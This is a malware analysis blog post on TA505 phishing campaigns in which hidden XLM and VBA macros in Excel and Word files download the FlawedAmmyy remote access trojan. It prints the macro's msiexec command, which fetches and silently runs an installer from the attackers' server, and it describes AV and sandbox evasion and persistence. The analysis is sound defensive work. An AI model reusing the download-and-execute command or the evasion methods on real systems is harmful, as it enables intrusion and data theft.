Published on March 4th, 2019 📆 | 1567 Views ⚑0
[SI-LAB] FlawedAmmyy Leveraging Undetected XLM Macros as an Infection Vehicle
In February 2019, SI-LAB captured multiple samples of phishing campaigns using an Office Excel document carrying a malicious Excel 4.0 macro, also known as XLM macro, and used to download and execute a final backdoor called FlawedAmmyy Remote Access Trojan (RAT).
XLM macros have been released for more than 20 years and are often used to make macro viruses. Today, Microsoft is using VBA macros (Visual Basic for Applications) instead of Excel 4.0 macro technology. This leads to XLM macros not being well known to the public. This technology is stored in the Workbook OLE stream in Excel 97-2003 format which makes it very difficult to detect and parse by antivirus (AV) engines.
SI-LAB has observed that Threat Actor (TA) 505 is now spreading the infamous FlawedAmmyy remote control backdoor using an old technique that is evading AV detection. The threat is only detected later when an MSI file (Windows installer) drops and execute the first infection stage of the malware.
As usual, threat actors are leveraging malscam campaigns as an attack vector to distribute the RAT. This malware is not new and it was used in past waves by TA505, a group known for sending large-scale Dridex, Locky, and GlobeImposter campaigns, among others.
The RAT is based on a leaked source code of the Ammyy Admin remote desktop software, and its features include remote desktop control, file system manager, proxy support and audio chat.
This piece of malware gives attackers full access to the victim’s device, allowing them to steal files, credentials, collect screenshots and access the camera and microphone. It also provides a backdoor for an attacker to move laterally through the network, serving as a potential entry point for a major supply chain attack.
After the Excel document is opened (xls file), the content it displays will lure the user to execute malicious Excel 4.0 macro code.
Malicious XLM macro code is located within a hidden form to avoid the attention of the victims. The name of the hidden form is written in Russian language: Макрос1 — Macro 1, in English.
The macro makes several string concatenations and executes via a pivot msiexec.exeprocess. This is part of a giant list of Living off the Land (LOL) techniques that attackers employ to mask their activities from runtime endpoint security monitoring tools such as AVs.
msiexec.exe process downloads an MSI installer that drops the first stage of the malware. This executable is simply a downloader for the next stage the malware (wsus.exe — the FlawedAmmyy itself).
TA505 group is using now a new entity to sign its malware denominated “AlCOHOL LTD”, with the following email associated: [email protected][.]ru.
The C2 server used by crooks is now offline. It was available at 220.127.116.11, a server geolocated in Latvia with ports 80 and 3389 opened. The first port is used to maintain communications between C2 and clients. The last one, an RDP service, is probably used by crooks to manage C2 server.
Users who receive emails with xls files attached should be aware as that files can be an undetected vehicle spreading any kind of malware.
The author behind these campaigns (TA505) has utilized several types of Microsoft Office file formats (.doc and .xlm) to evade antivirus detection and bypass spam filters as well.
Infection is dependent on the victim allowing the macro to run. Users should ensure that macros are disabled in their Microsoft Office applications.
For more details on this finding see the Technical Analysis below.
File name: patent-2019-02-20T093A283A05-1.xls
Creation date: 2018-12-19 10:42:12
First submission in VT: 2019-02-19 23:16:29
During February 2019, SI-LAB has registered multiple samples of phishing campaigns using Microsoft Office documents, namely .xls and .doc versions, used to download and execute a final backdoor called Flawedammyy RAT.
This threat has been closely observed by researchers from Proofpoint that discovered the RAT used since the beginning of 2016 in targeted phishing campaigns as well as massive, multi-million message campaigns.
The Threat Actor (TA) behind these attacks is known as TA505, a group responsible for sending large-scale Dridex, Locky, and GlobeImposter campaigns, among others, over the last four years.
At first glance, we analyzed a .xls document with an XLM macro (Excel 4.0 macro) embedded that is not detectable by AV engines.
Figure 1: Malicious xls file with an embedded XLM macro not detected by Virus Total.
Over the last days, several waves are disseminating this malware via email with .xls and .doc Microsoft Office documents attached. Phishing is, in fact, the major attack vector to distribute threats this nature in-the-wild.
The xls sample was submitted onto the Virus Total but no detections were noted. However, by looking into the file strings it was possible to identify some suspicious instructions.
Figure 2: Suspicious strings hardcoded in the xls file.
The command highlighted in Figure 2 is an instruction responsible to download an MSI file from the C2 server (hxxp://18.104.22.168/control), geolocated in Latvia and with ports 80 and 3389 opened to the Internet.
Figure 3:  Suspicious Microsoft Office files and C2 server IP address; and , geolocation and C2 ports.
In detail, the xls file acts as a downloader/installer using the msiexec.exe process as a pivot to download; in a headless mode; the new malicious file (MSI). That file has inside it another file, the first stage of the malware itself. That malware is known as FlawedAmmyy RAT and was discovered by Proofpoint researchers in March 2018.
Let’s investigate the XLM macro inside the Excel file
At first glance, the xls file seems legitimate as it is not classified as suspicious on VT. Nonetheless, as shown, some interesting strings were identified.
No VBA macros were observed inside the document which immediately raised the suspicion that it could be a new threat.
Figure 4: No VBA macros were detected.
An important point to note in “Root Entry” is the version of the document “Microsoft Excel 97-2003“. So, we are facing a living off the land technique, probably, XLM macros — an old technology that makes harder its intent and detection.
Figure 5: Microsoft Excel 97-2003 version identified.
Next image presents when the file is opened. Notice that macros are disabled by default and the document trigger a message to the user enable the execution of macros.
Figure 6: XLS document and the request to enable macro execution.
As shown in Figure 6, this file has only a visible sheet, and probably, a hidden sheet is also part of this document where an XLM macro is embedded as well.
As observed below and according to Google Translate technology, it was possible to detect that the sheet name is defined in the Ukrainian language.
Figure 7: Language used by crooks to name the visible xls sheet.
A deeper dive
XLS is a Compound Document File (CDF or CF) or Object Linking and Embedding (OLE) File.OLE files are hierarchical data structures that have several storages and streams (in contrast to folders and files in an operating system).
Figure 8 below shows the structure of the xls file. In this file, the Workbook stream is interesting as it contains all the information related to that workbook such as the included sheets.
The structure of this stream is fully specified in Microsoft Office Excel 97-2007 – Binary File Format Specification. We can see that the malicious string is:
- msiexec.exe RETURN=185 /i http://22.214.171.124/control /q ksw=’%TEMP%’
Figure 8: Suspicious string hardcoded in the Workbook structure of the xls file.
The msiexec.exe is one of several Living off the Land (LOL) techniques that crooks are using to mask suspicious activity from endpoint security tools such as antivirus. The Windows Installer technology (MSI) uses msiexec.exe for installing MSI and MSP packages.
See more about msiexec.exe and its parameters here.
Next, we’ll take a deeper look at the Workbook stream, which is in the BIFF8 format.
As it is depicted in Figure 9 (merge of 3 images), the msiexec command is found inside a Cell String (207h) record, part of the value of a formula.
Figure 9: Identification of the malicious string inside xls file (BIFF structure).
Now, we need to determine the sheet that contains this particular cell string. According to the XLM Spec, all information about a sheet such as its name, type, and stream position are kept within a BOUNDSHEET record (85h).
In Figure 10, we can see that this workbook has two BOUNDSHEET records; which means it has two sheets. However, one of them must be hidden as we can only see one sheet in Figure 6.
Figure 10: BOUNDSHEET records in the Workbook; representing two sheets.
Fig 11. Option flags in BOUNDSHEET record.
The first sheet starts at offset 0x017303 and the second one at offset 0x01781C. The cell formula that we are interested in is located in the hidden sheet.
We can unhide the sheet by either setting the hidden state to zero within the file or changing the setting through the Excel interface. It is interesting to note that the hidden state can also be set to 2; which is called very hidden state. Very hidden sheets cannot be unhidden through the Excel interface, they can only be toggled to visible via manual hex editing of the file. After unhiding the macro sheet, we can see the embedded macro clearly in the Excel GUI.
Figure 12: Hidden sheet with an XLM macro coded.
This macro is triggered when the document is opened; Auto_Open label points to cell A1.Next, the user is asked to enable active content, and then the msiexec and subsequent chain of events are automatically executed.
As mentioned earlier, XLM macros are an arcane technology that predates VBA (introduced in Excel 5.0).
By analyzing the macro code, it is only performed a concatenation process that results in a final string that will use to download an MSI file from the C2 server.
- msiexec.exe RETURN=185 /i http://126.96.36.199/control /q ksw=’%TEMP%’
We can see that the concatenation process is executed step-by-step, and several system calls are performed.
Figure 13: Concatenation process that produces the final command to download the MSI installer/dropper.
In detail, the EXEC function can be used to create processes, and using the REGISTER and CALL functions, attackers can use XLM macros to access the Win32 API. Shellcode injection is a major risk associated with XLM macros, leading to hard to detect in-memory attacks and various types of exploits and zero-day viruses being launched on the target system.
HALT() function stops all macros from running. Use HALT instead of RETURN to prevent a macro from returning to the macro that called it.
See more about macro commands here.
Finally, we can observe that thee msiexec.exe is executed and the MSI file is downloaded from the C2 server.
Figure 14: msiexec.exe is executed and MSI malicious file is downloaded from the C2 server.
However, as already mentioned at the beginning of the technical analysis, SI-LAB team obtained two types of files, namely xls and doc archives. The doc file works on the same way, however, it holds a VBA macro that runs the entire process in order to build the command to download the MSI file from the malicious C2 server.
Another document used by TA505 to spread FlawedAmmyy (.doc)
File name: 68131_46_20190219.doc
Creation time: 2019-02-19 22:57:00
First submition on VT: 2019-02-20 02:01:28
During this investigation, another sample was obtained. TA505 group has used .doc documents with embedded VBA macros to infect user’s devices as well.
Figure 15: Macro VBA detected in .doc document.
We can observe this document is a Microsoft Office Word created on February 19th.
Figure 16: File version and creation date.
As observed in Figure 17, the same image is presented in this version. Macros are also disabled, and a message is displayed to lure the victim to enable macros execution.
Figure 17: .doc file requesting macro execution.
In addition, when the macros are enabled a new process is promptly created; the msiexec.exe that downloads the MSI file from C2 server (similar to the xls version).
Let’s look at Figure 18, here another trick is used by crooks. When the doc file is executed, the file itself is closed if some error are triggered, or in contrast; the windows calculator.exeis opened in a well-succeeded execution.
Figure 18: msiexec.exe is executed in the .doc version.
The VBA code inside .doc file is presented in the following image (please, click to enlarge).
Figure 19: VBA macro embedded in doc file (click here to enlarge).
After the execution of the msiexec.exe command, the MSI installer/dropper is downloaded (this behavior is valid in both Office documents).
Figure 20: Network traffic when MSI dropper is downloaded.
Analyzing the MSI file – The installer/dropper of infamous FlawedAmmyy
File name: control
Creation time: 2012-09-21 09:56:09
First submission on VT: 2019-02-19 23:26:41
Looking inside the MSI file, we observed that it has appended a binary — the first stage of the FlawedAmmy, the backdoor.
Figure 20: Files that are part of MSI. A new binary is observed.
File name: Binary._D7D112F049BA1A655B5D9A1D0702DEE5
Creation time: 2019-02-19 19:46:06
First submission on VT: 2019-02-20 01:28:44
It is important to note this threat is recent and was identified as FlawedAmmy backdoor. This is a important indicator to corroborate our suspicions. Keep going!
Figure 21: FlawedAmmyy backdoor detection.
To corroborate our findings, we can observe some strings which demonstrate that the threat is, in fact, the infamous malware. AMMY is a kind of string found and coded in FlawedAmmyy samples. Also, the process wsus.exe consists of the second stage initiated later to create persistence in a vulnerable device. Both were identified as presented in Figure 22 below.
Figure 22: IOCs of FlawedAmmyy RAT.
Another important detail is the digital certificate. We can observe that malware is signed with a new entity never seen before in TA505 activities: “ALCOHOL LTD”. This binary was signed on Tuesday, February 19th, 2019, and the next email is also associated:[email protected]; from a Russian provider.
Figure 23: Digital certificate associated with the malware.
FlawedAmmyy is composed of two infection stages. The first one is a dropper responsible to allocates virtual memory to a new candidate, to unpack a second stage (wsus.exe – FlawedAmmyy itself) and also to execute it later in memory.
Continuing this analysis, it’s important to note that the first stage executes a scan in the target machine looking for some executables. It validates the presence of some consumer based AV solutions, and if one is found, it continues with a different path. If these executables are found the malware terminates its process.
Figure 24: RAT validates the presence of some consumer based AV solutions.
The full list of programs it is seeking is the following.
Figure 25: Customer-based AV solutions.
If none of the referenced AV is found, it will drop a temp file. This temp file is the Ammyy RAT encrypted file, which will be decrypted and renamed at a later stage (wsus.exe).
During malware analysis, we noticed that some entries to avoid sandboxes and Virtual Machines are also performed.
Figure 26: Malware exits if is running inside a virtual environment.
Meanwhile, the malware launches the second stage: wsus.exe. This binary has a special function: create persistence in the system.
We can observe that the first stage builds the wsus.exe IAT (in this case it is building the Kernel32.dll library).
Figure 27: First stage of RAT builts IAT and load some libraries (kernel32.dll this case).
Now, the second stage is completed. Next, it tries to delete Settings, Microsoft\\Enc, AMMYY, Foundation, and Foundation1 directories, also following files: wmihost.exe,settings3.bin, wmites.exe, wsus.exe from different directories. Clear all the vestiges of another infection can be the threat author intention.
Figure 28: RAT deletes some files and directories.
Soon afterwards, the malware validates if the user is an administrator in order to create persistence in the system. This is done through the instruction push 1; uMode depicted below.
Figure 29: Malware checks if the user is the administrator.
If the user is an admin, a new service in Windows Services is created (foundation); see offset 0x402A6B. Otherwise, it adds a new task in the Windows Task Scheduler (see offset 0x402AE7). Next, the service is started and initiated at the system startup of the operating system.
Figure 30: New service called foundation is created.
Figure 31: Service foundation created. It will execute wsus.exe binary as a service at startup.
As shown above, if the user has not an admin role, then a task is created in Windows Task Scheduler; look at offsets 0x402917 and 0x402928.
Figure 32: New task is created in offsets 0x402917 and 0x402928.
Figure 32: New task created in Windows Task Scheduler by malware.
At this point, the malware is installed in the target machine and became persistent.
During its execution on the infected machine, it communicates with the C2 server. One of the packets that RAT sends to C2 is the following. This information is composed by the name of the computer, domain, privileges and more (basically the standard Ammyy protocol).
Figure 33: FlawedAmmyy sends a packet to C2 with information about the infected machine.
More indicators for the RAT are matching the strings from the wsus.exe executable.
Figure 34: IOCs of FlawedAmmyy RAT present in wsus.exe.
The infamous FlawedAmmyy is alive and is being used by TA505 group to infect user’s devices. It’s interesting to note that the group behind these malscan campaigns is spreading the malware through Microsoft Office files to circumvent either antivirus detection and spam filters.
As shown, old XLM macros are still living off the land technique used by attacks to mask their detection and intent.
Initial infections occur when macros are enabled in the target system. Therefore, always ensure that you disable macros in your Microsoft Office applications.
Figure 35: How to disable macros on Microsoft Word.
On the other hand, XLM macros are probably more difficult to analyze by security products in contrast to VBA macros.
Microsoft is now using the Antimalware Scanning Interface (AMSI) with Office 365 for scanning VBA macros. Since XLM macros have nothing to do with the VBA engine, we suspected that XLM could be used to circumvent AMSI.
As a final consideration, it is interesting to observe that technology from 1992 can be used to circumvent the most recent Office security features.
Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.